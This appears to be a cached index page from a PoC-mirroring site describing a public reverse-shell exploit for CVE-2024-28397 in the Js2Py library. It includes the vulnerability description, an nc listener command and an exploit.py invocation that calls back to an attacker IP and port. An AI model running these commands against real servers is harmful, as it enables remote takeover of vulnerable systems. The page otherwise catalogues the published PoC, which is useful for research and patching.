CVE-2024-28397 PoC — Js2Py 安全漏洞

Source

https://github.com/0xPadme/CVE-2024-28397-Reverse-Shell

Associated Vulnerability

Title:Js2Py 安全漏洞 (CVE-2024-28397)
Description:Js2Py是Python基金会的一个库。用于将 JavaScript 转换为 Python 代码。 Js2Py 0.74 及之前版本存在安全漏洞，该漏洞源于组件 js2py.disable_pyimport() 中存在一个问题，攻击者利用该漏洞可以通过精心设计的 API 调用执行任意代码。

Description

Reverse shell for CVE-2024-28397.

Readme

# CVE-2024-28397-Reverse-Shell
Reverse shell for CVE-2024-28397.

Exploit works for js2py <= v0.74
## Requirements

- requests library (pip install requests)
- Python3
- Netcat (Or something that you can use as a listener for the reverse shell)

## Usage

##### For listener 
```bash
nc -lnvp 4444
```
##### For exploit 
```bash
python3 exploit.py 10.129.66.160 8000 /run_code --local_ip 10.10.15.11 --local_port 4444 
```

File Snapshot


 [4.0K]  /data/pocs/f698d4f4041d576eed6c3ce4e34e0e4b21709ea4
├── [1.7K]  exploit.py
└── [ 423]  README.md

1 directory, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!